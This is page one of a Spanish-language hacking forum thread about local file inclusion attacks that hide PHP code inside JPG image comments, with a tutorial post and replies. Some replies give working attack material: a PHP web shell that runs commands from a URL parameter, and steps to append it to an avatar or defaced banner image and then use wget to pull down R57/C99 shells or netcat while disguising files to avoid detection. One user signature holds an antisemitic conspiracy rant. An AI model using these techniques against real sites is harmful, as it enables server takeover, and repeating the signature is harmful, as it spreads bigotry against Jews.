Páginas: [1] 2 3 
|
 |
|
 Autor
|
Tema: Local JPG shell Inclusion (Leído 4946 veces)
|
codebreak
 Desconectado
Mensajes: 56
|
Este tutorial lo hice el otro día y lo mande a milw0rm, pero recién hoy lo subieron, ajajaj. Como ustedes deben saber ya, los Local File Inclusion difieren de los comúnmente abusados Remote File Inclusion en el hecho de que no se puede ejecutar código (shells o demases) que estén alojados en otras webs remotas. Debido a esto, las formas mas comunes de abusar de este bug, es mediante la inyección de código PHP en los logs de los servidores o simplemente mediante la inclusion de archivos locales que posean info valiosa (/etc/passwd o similar). Ahora, una de las razones por la cual esta vulnerabilidad esta poco "masificada" (en comparación al RFI) es principalmente debido al hecho de que poco o nada se puede hacer, pues bien muchas veces los directorios logs no son accesibles y en muchas otras la información "relevante" que se puede obtener, es demasiado incompleta como para poder sacar algún provecho. Debido a eso, se me ocurrió entonces ver que pasa si uno inyecta código PHP en los comentarios de los JPG's. No estoy hablando de agarrar una shell en .txt y nombrarla .jpg, pues eso no nos va a servir, ya que lo que deseamos es poder ejecutar esa shell de modo local y por ende, debemos subirla al servidor. ¿Como subimos una shell .jpg al servidor?.. Haciendo un .jpg valido, de modo que lo subamos, en el caso de poderse, mediante cualquier aplicación web (foros, guestbooks o demases). Como muchos saben, los JPG's tienen espacio para comentarios (ejemplo: cuando sacan fotos, y dice el modelo y marca de la cámara con que fue sacada).. entonces.. que pasa si inyectamos PHP ahí?. En el video que voy a adjuntar, explica paso a paso como realizar eso. Se puede hacer uso de un editor hexadecimal para lograrlo, pero es mas cómodo mediante una aplicación como la que incluyo pues, aparte de ser mas rápido, el comentario que incluye no es visto en las propiedades de la imagen, así que es incluso mas "oculto". Así que, como muestra este video, cualquier sitio web con error de LFI o RFI y que incluya algún foro o similar, donde podamos subir imágenes (ejemplo: avatar) se va a ver en un serio peligro, pues podremos incluir cuanto código queramos y ejecutarlos sin problema de manera local. Espero les guste el video. Entren aca: http://www.milw0rm.com/author/972Hagan click a "Local JPG shell Inclusion (LFI using php injected JPG)" Saludos  |
|
|
|
|
En línea
|
 W4ck1ng Team Member |
|
|
GroK
Desconectado
Mensajes: 571
...I have become comfortably numb...
|
Plas plas plas Muy bueno, muchas gracias por el aporte. Saludos |
|
|
|
|
En línea
|
"I put on my Hendrix album and my son said 'Dad, who's that?' and i said 'Well son, that's God' "- Robert Plant
|
|
|
Novlucker
 Conectado
Mensajes: 1.323
|
Nice!! Muy interesante.... me gusto mucho salu2 |
|
|
|
|
En línea
|
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y del Universo no estoy seguro." Albert Einstein |
|
|
kicking people
Desconectado
Mensajes: 210
|
Sencillamente perfecto, un tema algo complejo pero fácil de aprender gracias a la explicación que le das.  Felicitaciones y saludos. |
|
|
|
|
En línea
|
|
|
|
Kintaro
Desconectado
Mensajes: 74
|
que bueno chico, el primer ejemplo que vi de lfi en jpg, excelente !!!
|
|
|
|
|
En línea
|
¡Benkyo, benkyo, benkyo!
|
|
|
OzX
Desconectado
Mensajes: 260
[NuKe] Team
|
chico a menos que seas codebreak. codebreak es el autor de este tutorial. a menos que tengas doble nick. |
|
|
|
|
En línea
|
|
|
|
arabik
Desconectado
Mensajes: 183
0 = 1+(-1)
|
si que es el
en el video aprace el nombre de codebeak pero si te fijas bien tambien el de chiko
por cierto muy buena info
gracias
|
|
|
|
« Última modificación: 26 Marzo 2007, 00:50 por arabik »
|
En línea
|
subsecretario de defensa de eeuu, judio. presidente del banco mundial, judio. familia mas rica de russia judia. el tio mas rico e belgica judio, director del washintong post judio..............LO DE NO TENER UN PAIS ASTA EL 1947 NO SE SI ES UN INCOMBENIENTE O UNA VENTAJA "teniendo paisanos en cargos tan importantes y con tanto poder cualquiera les dice que cumplan las resoluciones de la o.n.u"
|
|
|
|
Azielito
|
Muy bueno, lo acabo de probar, crei que podia tener problemas con un sistema que estoy haciendo en PHP pero nada, salio limpio del test, sin embargo, he hecho los ejemplos y funciona a la perfeccion =)
solo como complemento, puedes enviar en una variable lo que vas a ejecutar =D <?php echo "<hr><pre>"; $ex = $_GET['cmd']; system($ex); echo "</pre><hr>"; exit; ?> y si que gusta >.< claro, hace falta poner el filtro para las dobles barras y eso, pero funciona muy bien  |
|
|
|
« Última modificación: 30 Marzo 2007, 00:06 por Azielito »
|
En línea
|
|
|
|
cacolo
Desconectado
Mensajes: 157
Motocross RiDer! / Registrado : 06 Abril 2006
|
Muy bueno, le estuve echando un ojo, pero con mi poca experiencia me quedo una duda, Solo sirven para poder editar el index? o por ejemplo se puede colar algun troyano y eso por la foto.
|
|
|
|
|
En línea
|
|
|
|
satan69
Desconectado
Mensajes: 307
|
Muy bueno, le estuve echando un ojo, pero con mi poca experiencia me quedo una duda, Solo sirven para poder editar el index? o por ejemplo se puede colar algun troyano y eso por la foto.
prix... teniendo acceso a cambiar el index poder hacer lo que quieras... hasta podes subir una shell y ponerle extension .php asi tienes acceso mas directo al servidor |
|
|
|
|
En línea
|
|
|
|
NewLog
Desconectado
Mensajes: 315
|
Impresionante...
|
|
|
|
|
En línea
|
|
|
|
R-Q-X
Desconectado
Mensajes: 34
|
se q lo q les voy a pedir es algo noob pero estoy buscando un editor de comentarios para jpg y no encuentro¬¬..baje el q utiliza codebreak y adivinen q=?? no me anda..dice q no se puede abrir. busq otros y solo encontre uno q en todoas las pags q lo veo tienen roto el enlace de descarga....si alguien me puede pasar algun link para bajar un editor q ande se los agradeceria mucho!
|
|
|
|
|
En línea
|
|
|
|
WHK
Desconectado
Mensajes: 799
+-=[Yan]=-+
|
No es necesario usar un editor de comentarios para eso... solo escribe el codigo en un texto y luego ejecutas type texto >> imagen.jpg y veras que el codigo se incrusta dentro del jpg sin modificar la imagen.
|
|
|
|
|
En línea
|
|
|
|
yeikos
Colaborador
Desconectado
Mensajes: 1.363
|
Claro, al igual que sucede con cualquier binario. Una técnica muy conocida es insertar la configuración del troyano al final de este, por ejemplo, <ip>127.0.0.1</ip>, habiendolo codificado previamente...
|
|
|
|
« Última modificación: 14 Junio 2007, 06:02 por ANELKAOS »
|
En línea
|
|
|
|
WHK
Desconectado
Mensajes: 799
+-=[Yan]=-+
|
abres el notepad y escribes: <? system("cmd"); die; ?>y lo guardas como inject.txt Despues abres la consola de comandos y ejecutas: type inject.txt >> imagen.jpgDonde imagen.jpg puede ser tu avatar. Veras que si abres la imagen se verá normal pero si lo abres con el block de notas podras ver el codigo injectado... En realidad lo unico que le importa al apache es que el comando se encuentre dentro de lo que buelcas en pantalla como por ejemplo un zip.... index.php?file=demo.zip o index.php?file_path=http://web.iespana.es/inject.mp3O puedes injectar un <? ob_clean(); ?> y a partir de eso le jalas un R57 o un C99 Shell si es que no te permite llamar archivos externos al servidor. A veces tambien puedes hacerlo desde un simple XSS injectando codigos PHP para ser ejecutados junto con el XSS. O desde un desfacing: Echo ^<? system("cmd"); die; ?^> >> barner.gif para no llamar la atención desfaceando el index o cualquier otra sección y hacemos durar mas la shell  luego solo basta con llamar a barner.gif?cmd=wget -c -t0 http://pagina/R57.php o le ponemos login.php para no levantar sospechas o jalamos el netcat directamente si el server es Unix.  Siempre y cuando el servidor te permita un safe off (Configuración que impide la ejecución de este tipo de codigos.) Por eso dicen que un administrador preparado es un servidor seguro. |
|
|
|
« Última modificación: 16 Mayo 2007, 03:59 por WHK »
|
En línea
|
|
|
|
|
Páginas: [1] 2 3 
|
|
|
 |
